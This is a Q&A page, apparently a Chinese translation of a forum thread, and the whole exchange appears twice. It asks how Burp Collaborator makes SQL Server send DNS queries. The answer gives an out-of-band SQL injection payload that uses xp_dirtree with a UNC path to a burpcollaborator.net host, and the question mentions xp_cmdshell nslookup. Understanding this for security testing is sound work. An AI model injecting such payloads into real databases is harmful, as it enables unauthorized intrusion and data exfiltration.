Burp Collaborator 如何通过 Sql 服务器和 T-sql 发送 DNS 查询
How does Burp Collaborator send a DNS query via Sql Server and T-sql
Burp Collaborator 如何通过 t-sql 和 Sql 服务器发送 DNS 查询?
https://portswigger.net/burp/help/collaborator.html
我知道您可以在 SQL Server 2005 或 2008 上的存储过程中使用例如 exec master..xp_cmdshell 'nslookup intel.com' 或 Dns.GetHostAddresses(),如下所述:
然而,今天允许 xp_cmdshell 的服务器并不多,这是理所当然的,但这意味着 Burp Collaborator 使用其他东西。什么?连接只需出站,无需返回任何内容。
找到答案,exec master.dbo.xp_dirtree。示例:
;exec master.dbo.xp_dirtree
'\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--
http://releases.portswigger.net/2015/09/1627.html
如果您安装了 Burp Suite Professional,您可以通过 Burp -> Burp Collaborator 客户端生成 link,然后轮询结果。
Burp Collaborator 如何通过 t-sql 和 Sql 服务器发送 DNS 查询?
https://portswigger.net/burp/help/collaborator.html
我知道您可以在 SQL Server 2005 或 2008 上的存储过程中使用例如 exec master..xp_cmdshell 'nslookup intel.com' 或 Dns.GetHostAddresses(),如下所述:
然而,今天允许 xp_cmdshell 的服务器并不多,这是理所当然的,但这意味着 Burp Collaborator 使用其他东西。什么?连接只需出站,无需返回任何内容。
找到答案,exec master.dbo.xp_dirtree。示例:
;exec master.dbo.xp_dirtree
'\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--
http://releases.portswigger.net/2015/09/1627.html
如果您安装了 Burp Suite Professional,您可以通过 Burp -> Burp Collaborator 客户端生成 link,然后轮询结果。